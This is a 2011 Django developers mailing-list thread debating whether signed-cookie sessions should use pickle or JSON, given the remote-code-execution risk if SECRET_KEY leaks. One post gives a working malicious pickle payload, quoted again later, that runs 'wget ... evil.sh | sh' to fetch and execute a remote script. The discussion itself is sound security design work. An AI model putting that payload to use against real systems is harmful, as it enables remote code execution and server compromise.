Removing pickle from cookie-based session storage

308 views
Skip to first unread message

Paul McMillan

unread,
Oct 2, 2011, 12:26:12 AM10/2/11
to django-d...@googlegroups.com
We recently committed changes to 1.4 that added signed cookie based
session storage. Session data is pickled, signed, and sent to the
client as a cookie. On receipt of the cookie, we check the signature,
unpickle, and use the data. We could use JSON instead of pickle, at
the expense of longer cookies.

I believe that our signing implementation is secure and correct.

However, I know that users of Django screw up from time to time. It's
not uncommon to see SECRET_KEY in a git repository, and that value is
often used in production. If SECRET_KEY is compromised, an attacker
can sign arbitrary cookie data. The use of pickle changes an attack
from "screw up the data in this application" to "arbitrary remote code
execution".

In light of this, we should be conservative and use JSON by
default instead of pickle.

-Paul

Kääriäinen Anssi

unread,
Oct 2, 2011, 2:42:35 AM10/2/11
to django-d...@googlegroups.com

If the size of the cookie turns out to be a problem, using compressed JSON instead of JSON is a very simple change. I tested on my crummy old laptop, and using zlib one can compress + decompress roughly 5000 short strings in a second. On reasonable hardware I guess that figure will be 10000-30000 per thread. In the limit, when the compressed size is around 4Kb, one can compress about 500 strings a second (or 1000-3000 on reasonable hardware). So, this could cause some performance concerns in extreme cases, but probably not enough to worry about.

The test program is simple:

import bz2
from datetime import datetime
import json
import random
import zlib

nums = [random.randint(0, 100000) for _ in range(0, 1000)]
var = json.dumps({'nums': nums})
start = datetime.now()
for i in range(0, 1000):
compressed = zlib.compress(var)
uncompressed = zlib.decompress(compressed)
print datetime.now() - start
print len(var)
print len(compressed)

Note that when compressing random integers, one will still get over 50% compression. On more realistic data, the compression should be more.

- Anssi

Florian Apolloner

unread,
Oct 2, 2011, 4:33:21 AM10/2/11
to django-d...@googlegroups.com
Hi Paul,

the initial patch indeed used JSON to dump the data, but while probably beeing more secure it had some drawbacks which do need consideration: The JSON backend didn't allow serialization of  arbitrary data, as such it was different to all the other backends which do allow it -- which means this backend isn't a dropin replacement. Since Django only supports one SESSION_ENGINE this might cause problems to some people, although I do think if your session stores more than let's say some ids and messages you are probably doing it wrong after all (At least in the lieu of cookie based session).

So either way, if we change it we need some notes in the documentation saying that this backend isn't compatible with the other backends…

Cheers,
Florian

P.S.: Btw, if you leak your secret key, you can get an admin user with a json backend too, while not being remote code execution it's still something I would consider as catastrophic as code execution in most of my projects. Oh and I know I am moving to thin ice now, but I'd still like to know: To my understanding pickle doesn't necessarily allow arbitrary code execution, I mean you can't stuff code into it, you can just control how and which objects are loaded into the session -- which can be worse enough depending on how those objects are used later on. Please correct me if I am wrong here, I am not trying to argue that pickle would be save to use, but would like to understand how such an attack would look like -- so I would appreciate if you could give a more or less concrete example

Paul McMillan

unread,
Oct 2, 2011, 5:06:45 AM10/2/11
to django-d...@googlegroups.com
We do actually already have compression in the code for JSON[1].
Unfortunately, we probably can't enable it by default since it has a
dependency on zlib. Looking at the code, it appears that we don't
compress the pickled cookie, which means that compressed JSON might
actually be more space efficient than our current implementation
(which could be compressed, but is not).

The other downside to JSON is that you can't serialize native Python
objects into a session, but you probably shouldn't be doing that
anyway.

-Paul

[1] https://code.djangoproject.com/browser/django/trunk/django/core/signing.py#L102

Alec Taylor

unread,
Oct 2, 2011, 7:42:25 AM10/2/11
to django-d...@googlegroups.com
Remove the pickle from the cookie jar!

Only cookies are meant to be there :P

> --
> You received this message because you are subscribed to the Google Groups "Django developers" group.
> To post to this group, send email to django-d...@googlegroups.com.
> To unsubscribe from this group, send email to django-develop...@googlegroups.com.
> For more options, visit this group at http://groups.google.com/group/django-developers?hl=en.
>
>

Paul McMillan

unread,
Oct 2, 2011, 8:31:19 AM10/2/11
to django-d...@googlegroups.com
> JSON backend didn't allow serialization of  arbitrary data, as such it was
> different to all the other backends which do allow it -- which means this
> backend isn't a dropin replacement.

Yeah, I agree. The cookie-based backend is already a bit "special", since it is functionally limited to around 4k.


> P.S.: Btw, if you leak your secret key, you can get an admin user with a
> json backend too, while not being remote code execution it's still something
> I would consider as catastrophic as code execution in most of my projects.

No. It's far less catastrophic. It just means I'm a Django admin and can trash that project (which you can then restore from the backups). I can't own all your other Django projects on the same machine, steal your deploy keys, root your server, and then configure it to attack your dev machine when you SSH into it to see why weird things are happening. Remote code execution is BAD.


> Oh and I know I am moving to thin ice now, but I'd still like to know: To my
> understanding pickle doesn't necessarily allow arbitrary code execution, I
<snip>

> like to understand how such an attack would look like -- so I would
> appreciate if you could give a more or less concrete example

I should not have skipped that demo during my Djangocon talk. Since you asked nicely... try this:

data = "cos\nsystem\n(S'wget -q -O - subversivecode.com/evil.sh | sh'\ntR.'"
import pickle; pickle.loads(data)

And then open a new bash window. 

Obviously that payload could be a whole lot more malicious. A rootkit and a reverse shell would be traditional. As I said in the talk, pickle == eval. Don't use pickle where you wouldn't use eval.

You can look at how the pickle works by running:
import pickletools; print pickletools.dis(data)

Hopefully that example was more or less concrete enough for you. ;)

-Paul

Jannis Leidel

unread,
Oct 2, 2011, 11:17:56 AM10/2/11
to django-d...@googlegroups.com

You may be right about users screwing things up once in a while but
that's entirely unrelated to the fact that the sessions app expects
every backend to handle any (read: pickle-able) data you hand it. At
least that's the status quo on how every session backend I've seen
works.

That's why we haven't used the JSON encoder but instead opted to a
pickled encoder in the session backend, which was already a deviation
in the related signed cookies code which does indeed use JSON.

So, long story short, I don't think you made a convincing argument
to me in proposing to ship a non-conforming session backend. Hence
I propose to instead promote the section about SECRET_KEY in the
session docs to a "big fat warning" and let the users decide how and
when they use it.

Jannis

Florian Apolloner

unread,
Oct 2, 2011, 12:04:38 PM10/2/11
to django-d...@googlegroups.com
Hi,


On Sunday, October 2, 2011 2:31:19 PM UTC+2, Paul McMillan wrote:
> P.S.: Btw, if you leak your secret key, you can get an admin user with a
> json backend too, while not being remote code execution it's still something
> I would consider as catastrophic as code execution in most of my projects.

No. It's far less catastrophic. It just means I'm a Django admin and can trash that project (which you can then restore from the backups). I can't own all your other Django projects on the same machine, steal your deploy keys, root your server, and then configure it to attack your dev machine when you SSH into it to see why weird things are happening. Remote code execution is BAD.

Okay even if you disagree, I consider both catastrophic (For me there is no such thing as less catastrophic -- heads would roll in either case).
 
data = "cos\nsystem\n(S'wget -q -O - subversivecode.com/evil.sh | sh'\ntR.'"
import pickle; pickle.loads(data)

And then open a new bash window. 

Wow, I have to read up on pickle again, thanks for the great example -- though my "paranoia" forced me to try it without "|sh" no matter how trustworthy you are ;)

Thanks again for the explanation.

Cheers,
Florian

Paul McMillan

unread,
Oct 2, 2011, 5:07:03 PM10/2/11
to django-d...@googlegroups.com
> You may be right about users screwing things up once in a while but
> that's entirely unrelated to the fact that the sessions app expects
> every backend to handle any (read: pickle-able) data you hand it. At
> least that's the status quo on how every session backend I've seen
> works.

Yeah. Dropping pickle would be a pretty major departure from the way
the other session backends work. This backend already has several
other properties that make it uniquely different:
- ~4k character limit
- limited enforcement of session destruction
- transparency of session contents
I wasn't sure if changing the "pickleable" feature might be an
acceptable tradeoff.

> So, long story short, I don't think you made a convincing argument
> to me in proposing to ship a non-conforming session backend. Hence
> I propose to instead promote the section about SECRET_KEY in the
> session docs to a "big fat warning" and let the users decide how and
> when they use it.

That would be a good option.

I need to apologize (particularly to Jannis who worked really hard to
get this feature into core) that my original message sounded like
nobody thought about this before they implemented it. It was discussed
(and documented as part of the signing code).

My primary concern here is the expanded reliance on SECRET_KEY for
security. As a general principle, the less we rely on it directly for
our security, the better. We currently use SECRET_KEY on a limited
basis internally:
- salt for random token generation
- signing messages and sessions stored on disk
- signing intermediate data in formtools
- the signing framework (not used much internally yet) and salted_hmac
- these cookies (which use the signing framework)

As I said in the first message, to the best of my knowledge, there's
nothing insecure about the implementation now. The usage of signing to
validate pickles received directly by end users expands our reliance
on SECRET_KEY pretty heavily. This concerns me, which is why I brought
it up here.

-Paul

Kääriäinen Anssi

unread,
Oct 2, 2011, 5:21:31 PM10/2/11
to django-d...@googlegroups.com
"""
As I said in the first message, to the best of my knowledge, there's
nothing insecure about the implementation now. The usage of signing to
validate pickles received directly by end users expands our reliance
on SECRET_KEY pretty heavily. This concerns me, which is why I brought
it up here.
"""

Isn't there also the possibility that the attacker can somehow get arbitrary data signed into the session cookie without knowing SECRET_KEY? This could be due to a bug in the session framework or the developer does something really stupid. If this would be the case, then the bug would result in remote code execution exploit instead of the user being able to manipulate his session. Which sounds kinda scary.

If this is not changed to use JSON, there must be a warning that if the attacker can somehow change the contents of the cookie while keeping it signed, this results in remote exploit. One such way is knowing the SECRET_KEY.

My feeling is that this should be changed.

- Anssi

Kääriäinen Anssi

unread,
Oct 2, 2011, 5:24:38 PM10/2/11
to django-d...@googlegroups.com
Forgetaboutit, the exact same problem is there for every session backend. This btw means that having write access to django_session table means exploit of all Django instances using that DB, right?

Paul McMillan

unread,
Oct 2, 2011, 6:05:22 PM10/2/11
to django-d...@googlegroups.com
As I said before, the existing implementation is secure, if the
SECRET_KEY is kept secret. The sky is not falling, don't panic.

> Isn't there also the possibility that the attacker can somehow get arbitrary data signed into the session cookie without knowing SECRET_KEY?

That's not a viable attack route. It's much less likely than a
developer exposing their SECRET_KEY. The signing process for the
cookie pickles the data passed in, and it's not possible to create a
malicious pickle by passing arbitrary data into the pickle function.
It's only possible if the data can be modified after it has been
pickled, which the signing explicitly prevents.


> Forgetaboutit, the exact same problem is there for every session backend. This btw means that having write access to django_session table means exploit of all Django instances using that DB, right?

No, the same problem is not there for every session backend. The ones
which are written to disk are signed in the same fashion. It is
assumed that if an attacker has raw write access to your database, you
have much bigger problems (especially since many databases directly
allow system-level code execution in some form or another). I've
looked at that code extensively, it's fine.

-Paul

Kääriäinen Anssi

unread,
Oct 2, 2011, 6:09:39 PM10/2/11
to django-d...@googlegroups.com
Ok, sorry for the uninformed rambling... Will check the code before posting next time :)

- Anssi

Daniel Swarbrick

unread,
Oct 3, 2011, 1:51:32 AM10/3/11
to Django developers


On Oct 2, 2:31 pm, Paul McMillan <p...@mcmillan.ws> wrote:
> data = "cos\nsystem\n(S'wget -q -O - subversivecode.com/evil.sh | sh'\ntR.'"
> import pickle; pickle.loads(data)
>

Some workarounds for Pickle's execution of arbitrary code are proposed
here http://nadiana.com/python-pickle-insecure

Also note one of the comments on that post points out that JSON
converts all strings to unicode, and therefore cannot accurately
restore byte-strings.

I'd have to check through some of my own apps, but I suspect there may
be users who are storing complex Python objects in sessions, whose
code would break if Pickle was dropped.

Anssi Kääriäinen

unread,
Oct 3, 2011, 3:44:34 AM10/3/11
to django-d...@googlegroups.com, Paul McMillan
On 10/03/2011 01:05 AM, Paul McMillan wrote:
>> Isn't there also the possibility that the attacker can somehow get arbitrary data signed into the session cookie without knowing SECRET_KEY?
> That's not a viable attack route. It's much less likely than a
> developer exposing their SECRET_KEY.
Now that I have read most of the code related to this. I must say the
above is true.

The biggest risk that comes to mind is doing a quick little demo
project, left it running somewhere publicly while also releasing the
source code of that demo project. You might not care about the data you
have in that demo, so having SECRET_KEY revealed doesn't sound that bad.

For example I have done exactly the above, though only to internally
available machine here at work. If I was using cookie backend, that
would mean I also gave remote shell rights to my box which doesn't sound
nice. I wonder if I am the only one who has done that.

On the other hand having my user account's password accidentally
revealed means also remote shell, so in that way there is no big
difference here...

- Anssi

hcarvalhoalves

unread,
Nov 10, 2011, 12:46:46 PM11/10/11
to Django developers
To reinforce the already commented issue:

Werkzeug suffers from the same problem, since it's SecureCookie
implementation pickles data by default.

https://github.com/mitsuhiko/werkzeug/issues/60 (See proof of concept
added)

To unpickle data from an untrusted client by default is a big
potential remote code execution exploit, and a leaking SECRET_KEY
shouldn't lead to such a compromise.

There's no reason to not use JSON by default since it's adequate for
most cases where you need to store lightweight data client-side, since
it's most useful to use with FormWizard and such, where the fields are
easily serialized as strings. If it can't be a drop-in replacement to
the other session storage, just document it and offer a
PickleSignedSessionStorage, but don't push a possibly insecure
default.

Paul McMillan

unread,
Nov 10, 2011, 3:05:37 PM11/10/11
to django-d...@googlegroups.com
> There's no reason to not use JSON by default since it's adequate for
> most cases where you need to store lightweight data client-side, since
> it's most useful to use with FormWizard and such, where the fields are
> easily serialized as strings. If it can't be a drop-in replacement to
> the other session storage, just document it and offer a
> PickleSignedSessionStorage, but don't push a possibly insecure
> default.

The default is secure. If you don't disclose your secret key, you
don't have a problem.

JSON is considerably more verbose. Cookie space is limited. JSON
doesn't support many of the data structures people store in sessions.
There are many reasons to store data in sessions beyond FormWizard. It
already isn't a drop-in replacement, since it has limitations the
other ones don't have.

Anssi Kääriäinen

unread,
Nov 10, 2011, 6:21:45 PM11/10/11
to Django developers
Would it make sense to allow easier subclassing of
signed_cookies.SessionStore? The standard SessionStore could use
self.serializer instead of the hardcoded PickleSerializer (patch size
3 lines). Then document how to subclass SessionStore:

from django.contrib.sessions.backends.signed_cookies import
SessionStore
from django.core.signing import JSONSerializer

class JSONSessionStore(SessionStore):
self.serializer = JSONSerializer

This would allow the developer to pick the tradeoff between JSON and
Pickle instead of Django enforcing the choice. Not that it is that
hard to subclass the SessionStore currently, but this would make it
even easier, and documentation would make it part of the public API.

- Anssi

hcarvalhoalves

unread,
Nov 11, 2011, 6:25:45 PM11/11/11
to Django developers
On 10 nov, 18:05, Paul McMillan <p...@mcmillan.ws> wrote:
> > There's no reason to not use JSON by default since it's adequate for
> > most cases where you need to store lightweight data client-side, since
> > it's most useful to use with FormWizard and such, where the fields are
> > easily serialized as strings. If it can't be a drop-in replacement to
> > the other session storage, just document it and offer a
> > PickleSignedSessionStorage, but don't push a possibly insecure
> > default.
>
> The default is secure. If you don't disclose your secret key, you
> don't have a problem.

The problem is, if you *do* leak the secret key - or new bugs in the
session handling component are found - what should be a session hi-
jack issue escalates to a remote code execution exploit. I shouldn't
have to insist on how bad that is.

> JSON is considerably more verbose. Cookie space is limited. JSON
> doesn't support many of the data structures people store in sessions.
> There are many reasons to store data in sessions beyond FormWizard. It
> already isn't a drop-in replacement, since it has limitations the
> other ones don't have.

There's nothing wrong with providing a pickle serializer. I'm just
opposed to making it default.

At the very least, add to the official documentation a mention to the
possible security issues, so the concerned developer can make a choice.

hcarvalhoalves

unread,
Nov 11, 2011, 6:31:12 PM11/11/11
to Django developers
That's how Werkzeug's SecureCookie is implemented also. Besides,
that's just good practice. +1

Donald Stufft

unread,
Nov 11, 2011, 6:42:32 PM11/11/11
to django-d...@googlegroups.com
Can we provide a setting that lets you switch between the two? Then you can let developers choose their poison?
Reply all
Reply to author
Forward
0 new messages